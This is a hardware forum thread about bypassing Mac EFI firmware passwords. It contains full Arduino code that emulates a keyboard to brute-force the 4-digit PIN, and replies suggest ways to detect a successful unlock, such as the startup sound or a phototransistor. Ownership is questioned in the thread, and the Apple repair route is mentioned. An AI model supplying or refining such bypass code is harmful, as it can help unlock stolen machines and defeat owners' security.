Mac EFI password device

[nhoj_yelbom]

this device is pretty neat, guy is selling them on ebay for $140. i have had to re-flash my efi chip (late 2011 MBP ) manually when i found out it had a efi password. the password blocks booting from anything other than default, so os restores etc cant be done on the machine. the device uses credits to charge for each unlock, curious to see if anyone knows the inner workings! im sure the fw is protected on the device to prevent copies

http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=251341941666&fromMakeTrack=true&ssPageName=VIP:watchlink:top:en

[mikeselectricstuff]

Not famililar with  Mac stuff but at a guess it's probably just reprogramming an SPI flash chip

[nhoj_yelbom]

anyone able to convert this arduino code to .hex i can use in amtel flip programming? for AT90USB162, im not up to the level needed to convert it. thanks

Code: [Select]

#include <usb_keyboard.h>
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is indented for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.
const int ledPin = 13; // choose the pin for the LED
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT); // declare LED as output
delay(10000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter <= 9999){
delay(8000);
digitalWrite(ledPin, LOW);
delay(5500);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
//sending first digit
Keyboard.press(pin[0]);
delay(450);
Keyboard.release(pin[0]);
delay(420);
//sending second digit
Keyboard.press(pin[1]);
delay(398);
Keyboard.release(pin[1]);
delay(510);
//sending third digit
Keyboard.press(pin[2]);
delay(421);
Keyboard.release(pin[2]);
delay(423);
//sending forth digit
Keyboard.press(pin[3]);
delay(430);
Keyboard.release(pin[3]);
delay(525);
//sending enter
Keyboard.press(KEY_ENTER);
delay(305);
Keyboard.release(KEY_ENTER);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
fakecounter = counter;
}

Moderator Message: Please create a new thread for this post as it doesn't seem to be related to the first one in this thread.
""this is for the efi password, i can make a new thread if needed"

[amyk]

Not famililar with  Mac stuff but at a guess it's probably just reprogramming an SPI flash chip

Agreed. A cheap logic analyser (Saleae and clones come to mind) will probably tell you very easily how it does that. The Thinkpads use a similar scheme where the password is stored in an EEPROM and you can reset it much the same way.

...and I'm not entirely sure how a LED blinking code is related to that in any way.

[Lurch]

this device is pretty neat, guy is selling them on ebay for $140.

You'd think for $140 the seller could give more than 3 minutes to writing up a description. I don't see what this does?

anyone able to convert this arduino code to .hex i can use in amtel flip programming? for AT90USB162, im not up to the level needed to convert it. thanks

If you're not up to the level of converting an Arduino sketch to hex then I can see some "how do I unbrick x" posts coming up.

[nhoj_yelbom]

this device is pretty neat, guy is selling them on ebay for $140.

You'd think for $140 the seller could give more than 3 minutes to writing up a description. I don't see what this does?

anyone able to convert this arduino code to .hex i can use in amtel flip programming? for AT90USB162, im not up to the level needed to convert it. thanks

If you're not up to the level of converting an Arduino sketch to hex then I can see some "how do I unbrick x" posts coming up.

i have no programming language knowledge, and i cant find the hex in the temp folder on version 1.05. this code is for brute forcing the efi pin, so no bricking

[Tac Eht Xilef]

the device uses credits to charge for each unlock, curious to see if anyone knows the inner workings!

You'd be surprised. There's 2 methods, depending on the model - the first emulates the keyboard and simply brute-forces the 4-digit password; the second simply reflashes the EFI firmware with one extracted from an Apple EFI firmware update.

im sure the fw is protected on the device to prevent copies

I'm sure it is too - don't want people figuring out how to get around the use counter he's crippled it with. Nice of him to offer a $25 'core charge'-style refund if you return the used unit to him though...

(p.s. Apple will generally do it for free - even out of warranty - if you can prove you're the owner e.g. you bought your Mac direct from them, have a retail receipt with S/N, have ever registered it for Applecare, etc.)

[nhoj_yelbom]

the device uses credits to charge for each unlock, curious to see if anyone knows the inner workings!

You'd be surprised. There's 2 methods, depending on the model - the first emulates the keyboard and simply brute-forces the 4-digit password; the second simply reflashes the EFI firmware with one extracted from an Apple EFI firmware update.

im sure the fw is protected on the device to prevent copies

I'm sure it is too - don't want people figuring out how to get around the use counter he's crippled it with. Nice of him to offer a $25 'core charge'-style refund if you return the used unit to him though...

(p.s. Apple will generally do it for free - even out of warranty - if you can prove you're the owner e.g. you bought your Mac direct from them, have a retail receipt with S/N, have ever registered it for Applecare, etc.)

thanks for the reply. this unit he is selling reflashes the efi chip. i have the efi brute force code posted for teensydruino, i need it on my AT90USB162. apple is no help "genius" bar is 200+ miles away, and when you buy used there is no proof of purchase. hopefully everyone that sees this thread will check for efi password before they get in the same situation.

[Tac Eht Xilef]

i have the efi brute force code posted for teensydruino, i need it on my AT90USB162.

Ah, so that's what the code is for - it seemed to have no connection to your initial post, so I didn't bother reading it.

i have no programming language knowledge, and i cant find the hex in the temp folder on version 1.05.

Try setting the build.path variable in the Arduino IDE's preferences.txt, or turn on verbose messages when compiling. But if you really have no experience, and you're not using one of the Arduino-targetted AT90USB162 boards, then there's a whole lot of other stuff (e.g. clock speed, fuse bits, etc) you'll have to take into account even if someone does offer to compile it for you.

[nhoj_yelbom]

i have the efi brute force code posted for teensydruino, i need it on my AT90USB162.

Ah, so that's what the code is for - it seemed to have no connection to your initial post, so I didn't bother reading it.

i have no programming language knowledge, and i cant find the hex in the temp folder on version 1.05.

Try setting the build.path variable in the Arduino IDE's preferences.txt, or turn on verbose messages when compiling. But if you really have no experience, and you're not using one of the Arduino-targetted AT90USB162 boards, then there's a whole lot of other stuff (e.g. clock speed, fuse bits, etc) you'll have to take into account even if someone does offer to compile it for you.

thank you. i should have my teensy next week, so it may be too much trouble then.

[lorth]

You better do all of this, and the next boot with no internet before you wipe everything. If someone with a Mac was "savvy" enough to put an EFI password, they will probably also have FinMyMac or Prey installed... Because, why would a "normal" seller sell you something with a password that he/She doesn't tell you or that you can contact to ask...?

[amyk]

You better do all of this, and the next boot with no internet before you wipe everything. If someone with a Mac was "savvy" enough to put an EFI password, they will probably also have FinMyMac or Prey installed... Because, why would a "normal" seller sell you something with a password that he/She doesn't tell you or that you can contact to ask...?

Sometimes it's an employee who puts a password on a company's laptop, then leaves/dies/etc. The company can't be bothered going through the whole process so just sells them as-is as non-working parts units. Happens all the time with Thinkpads.

[kripton2035]

sometimes (often) it is someone that wants to remove his login password he has lost
and there it's easy to change the firmware password, the tools are at one menu line of each other
then they reset the login password, but dont remove the firmware password they just set
then they forget ...
I often have these schemes from people coming to the shop.

[nhoj_yelbom]

You better do all of this, and the next boot with no internet before you wipe everything. If someone with a Mac was "savvy" enough to put an EFI password, they will probably also have FinMyMac or Prey installed... Because, why would a "normal" seller sell you something with a password that he/She doesn't tell you or that you can contact to ask...?

you don't have to be mac savvy for it to have EFI password, if it's locked with find my mac it adds the same icloud pin to EFI. in my case i had a computer with efi pass only, and until i needed to reload os is when i found out.

btw: does anyone here know how to add to that teensyduino code (above) to allow it to remember the correct pin? otherwise i will have to re-run and keep narrowing it down. thanks

[Tac Eht Xilef]

btw: does anyone here know how to add to that teensyduino code (above) to allow it to remember the correct pin? otherwise i will have to re-run and keep narrowing it down.

Q: How does the arduino know what the correct PIN is?

A: It doesn't; there's no feedback or acknowledgement to the USB/keyboard that the laptop has sucessfully unlocked.

It looks like it prints each PIN to stdout as it tries it, but that's no good unless you're sitting there and see it unlock. I guess you could rig something up to look for some related sign (change of screen light level / colour from screen? Login sound?), store the value, & stop the loop.

But why not just reset the EFI PIN? Once you're in you don't need the password to do that...

[nhoj_yelbom]

btw: does anyone here know how to add to that teensyduino code (above) to allow it to remember the correct pin? otherwise i will have to re-run and keep narrowing it down.

Q: How does the arduino know what the correct PIN is?

A: It doesn't; there's no feedback or acknowledgement to the USB/keyboard that the laptop has sucessfully unlocked.

It looks like it prints each PIN to stdout as it tries it, but that's no good unless you're sitting there and see it unlock. I guess you could rig something up to look for some related sign (change of screen light level / colour from screen? Login sound?), store the value, & stop the loop.


But why not just reset the EFI PIN? Once you're in you don't need the password to do that...

the pin entry is dots, does not reveal whats typed in. pin needs to be known to change, just verified. there is another ebay auction with a teensy brute force that claims to memorize the correct pin, and create a text file on the device.

[Tac Eht Xilef]

the pin entry is dots, does not reveal whats typed in.

Sorry, I wasn't clear - before it sends keystrokes to the Mac, the arduino sends the PIN it's about to try to stdout (which isn't configured in your code, so I guess it's just dropped). You could configure stdout to go somewhere (e.g. serial, change the sprintf statement to print to LCD, etc), wait to see the Mac unlocked, and check the output to see what the last PIN tried was.

If you can think of a way to detect that the Mac has unlocked, you wouldn't have to sit there waiting for it - you could simply let it run and check the result later.

pin needs to be known to change, just verified.

As far as I know, no it doesn't - once you're past the EFI lock you can log in as root or boot into single-user mode & reset the EFI password using standard utiities on the install CD / rescue partition without knowing the old one.

there is another ebay auction with a teensy brute force that claims to memorize the correct pin, and create a text file on the device.

Then it has a way of detecting when it's gotten past the password. I mentioned that earlier - but, as I hinted, I can't think of a way that doesn't involve additional hardware.

At this point I'm a little uncomfortable going further without a decent explanation of why you want to do this. At the very least, you should probably put some of your own time into understanding how the code you've found and posted works rather than just asking other people to compile / modify / explain it for you...

[nhoj_yelbom]

i have explained in the previous post's why i have a efi password. i bought the computer used over 1 year ago, now i realized i cant install mavericks from usb.

i have verified on my 2012 macbook pro that has efi pass setup, it does require old password to change it. hold option, enter password, recovery, utilities, efi password. it has enter old password, enter new, verify new

Then it has a way of detecting when it's gotten past the password. I mentioned that earlier - but, as I hinted, I can't think of a way that doesn't involve additional hardware.

i have a at90usb162 that im sure could key log?

[kripton2035]

if you have lost an efi password on a recent mac, you'd better go to an apple store with some proof of purchase and get the passwor removed.
it will cost you far less than a toasted logic board if you try to reflas some ridiculously small chip. IMHO.

[amyk]

What changes when you've entered the correct one? Maybe a phototransistor pointed at the screen might work...

[peter.mitchell]

a pin to the speaker driver and a wait on the loop, so if a successful key is entered it detects the startup sound. I know the startup sound can be disabled, but often it is not. May also be able to use a USB device, as when the usb driver is loaded, devices on the bus are reset.

[nhoj_yelbom]

i have my teensy 3.0 working, anyone know arduino code? i would like it to log the last XXXX entered or log all entered. thanks!